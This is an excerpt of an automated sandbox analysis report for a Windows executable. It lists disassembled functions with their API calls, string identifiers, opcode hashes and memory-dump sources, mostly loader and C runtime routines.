                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                            • Opcode ID: 4f5db8db42a179c859e09bf65a593195edfd865d507e78e6ef289098e6d7c94c
                                                                                                                                                                                                                            • Instruction ID: 7386165c8d81491c8f5b2032706016064dd7a730c507caace44343a0afb06f49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f5db8db42a179c859e09bf65a593195edfd865d507e78e6ef289098e6d7c94c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD12A532E0C35386FB609A16E0547B97AA1FF8075CFA44135E699876C6DFBCE480CB81
                                                                                                                                                                                                                            Function 00007FF602991050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                            • Opcode ID: 95384b4ce990e1df0dc17a3476bd79f25d99c368e091164d9f543bba941a9f0f
                                                                                                                                                                                                                            • Instruction ID: 61071919497190408305b52eff83032eb13e3f3dd0a51340af775f8bec4c68fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95384b4ce990e1df0dc17a3476bd79f25d99c368e091164d9f543bba941a9f0f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E341A121B086435AFA209B1BA9402BAAB91FF44BECF644031DD4DC7B97DEBCF4158740
                                                                                                                                                                                                                            Function 00007FF602991440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                            • Opcode ID: ff0acaeb77fe319464f1ac4b29543caf46e6389b2aac69788df65a770f30c031
                                                                                                                                                                                                                            • Instruction ID: 05d9939a604ca1e7857d80ceffd146b9703c76f20ee8ac666096bf33306acd8f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff0acaeb77fe319464f1ac4b29543caf46e6389b2aac69788df65a770f30c031
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4141B921B086434AFE219B1BA5401B96BA0FF047E8F744031DE5EC7A97EEBCE4518740
                                                                                                                                                                                                                            Function 00007FF60299DA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                            • Opcode ID: 19671194003f52c4278ab70e2128ccfc4a2a1802a4b374d55b6eb69b848c92c7
                                                                                                                                                                                                                            • Instruction ID: 93098e32f870effb9facc280b8d9133888da80a053ba9aa26927f05bb22821f4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19671194003f52c4278ab70e2128ccfc4a2a1802a4b374d55b6eb69b848c92c7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4D175329087418AEB20EB6AD4813AD7BA4FF557ACF200135EE4D97B96DF78E460C750
                                                                                                                                                                                                                            Function 00007FF60299CD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDBD
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDCB
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDF5
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CE63
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CE6F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                            • Opcode ID: f4b61b4a979ce7b8aa7688bccc3df649cfb1a919573dd57fb344de185da50708
                                                                                                                                                                                                                            • Instruction ID: 177b2c74e9944bd3e482a7f05618e4711a866a87176818f598c54d1c9b0cfafd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4b61b4a979ce7b8aa7688bccc3df649cfb1a919573dd57fb344de185da50708
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D731F821B1A70295EE52DB5BA8005742B98FF0CBB8F695536DD1E87382DFBCE864C340
                                                                                                                                                                                                                            Function 00007FF6029A9FD0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: e38563850e33a3d70c3638927fd3cd052d41678c0d142ec097422236f338dfc6
                                                                                                                                                                                                                            • Instruction ID: 7641d18633335180a6573666d5c874795cd9774ed52d63362414a19d8978bc5d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e38563850e33a3d70c3638927fd3cd052d41678c0d142ec097422236f338dfc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67218020E0C75242FB599723564217959625F49BACF340734E83E87AD7DEEDB4008390
                                                                                                                                                                                                                            Function 00007FF6029B6D4C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                            • Opcode ID: 17f0a2ce441502ced7ada2557d00087b7598f0e631849b46a0ea05360e476559
                                                                                                                                                                                                                            • Instruction ID: a766c2c9121e7f1eff9ce8c99fcdf14da72c8e044ea36689464694f4b191c2aa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17f0a2ce441502ced7ada2557d00087b7598f0e631849b46a0ea05360e476559
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC119D21B18A4186E7918B57E944329BAA4FF98FE8F600234EA5DC7795CFBCE9048740
                                                                                                                                                                                                                            Function 00007FF6029AA148 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA157
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA18D
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1BA
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1CB
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1DC
                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1F7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: 798535c268e5adfaccf36fa57634d4db2e53bef2a69dd7bacf8aaaa2b4654dd1
                                                                                                                                                                                                                            • Instruction ID: 2b11fe98feed3692f489ea1f102293dde1978b8413173d7977f817dd4a9c123e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 798535c268e5adfaccf36fa57634d4db2e53bef2a69dd7bacf8aaaa2b4654dd1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2115E20E0C74252FB59A7275A411796AA25F48BBCF744B34E83E86BD7DEACB441C390
                                                                                                                                                                                                                            Function 00007FF602992300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                            • Opcode ID: d657a5c44da67d99a86407bb8d2d415756a96187bdc2950f9261e1312da2d2a3
                                                                                                                                                                                                                            • Instruction ID: ef34a427f1518c5eaf43b796a104795b6c020d3000fdc189ec4866e2a649e1a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d657a5c44da67d99a86407bb8d2d415756a96187bdc2950f9261e1312da2d2a3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08316232A1968289EB24DF62E8552F97B60FF89798F640135EE4E87B56DF7CD104C700
                                                                                                                                                                                                                            Function 00007FF602992760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                            • API String ID: 1878133881-640379615
                                                                                                                                                                                                                            • Opcode ID: f3bee6976c6ce7adacfe24201ed7d89ccca1e5ba8d7f82445705658a28266722
                                                                                                                                                                                                                            • Instruction ID: 318d22b170755d67a478e1c826c01c0feb160f0b4e86970919d69a126c05e5ff
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3bee6976c6ce7adacfe24201ed7d89ccca1e5ba8d7f82445705658a28266722
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC219172A28BC291E720DB16F4517EA6764FF8478CF500036EA8C8369ADFBCD255C740
                                                                                                                                                                                                                            Function 00007FF6029A8908 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            • Opcode ID: c363bace5bda0f06f40d3f02de499b28d92a603ede12d76f1b185844c60c5271
                                                                                                                                                                                                                            • Instruction ID: b5aee352305c4dbf249c6b6d74961919f0a3851795192f7b1c84ca149870ad73
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c363bace5bda0f06f40d3f02de499b28d92a603ede12d76f1b185844c60c5271
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29F09661F0870681FB108B26E4483395B60FF89BA9F740635C9ADC55F6CFACD449C740
                                                                                                                                                                                                                            Function 00007FF6029B83D0 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                            • Instruction ID: 332dd5e9d991a9e25a840e94597d944fa3de8dd085fc6cfaa2d312877b281fdc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6119EB2E1CA1301F756112AF6623B91D4BBF5D378F780A34E96E866D7CEECA8414204
                                                                                                                                                                                                                            Function 00007FF6029AA210 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA22F
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA24E
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA276
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA287
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA298
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: af8da5a527d05b95a7852b7dd45c45bc26a6b8390686fc0ba138860700093caa
                                                                                                                                                                                                                            • Instruction ID: 02b421b03c9dd081dc2a305b6c1ce0c24cae06c17d3a6b44948bb8b23705faba
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af8da5a527d05b95a7852b7dd45c45bc26a6b8390686fc0ba138860700093caa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51114C20E0C70243FB999727964117969926F547B8F344734EC3E86BDBDEADE851C390
                                                                                                                                                                                                                            Function 00007FF6029AA0A4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
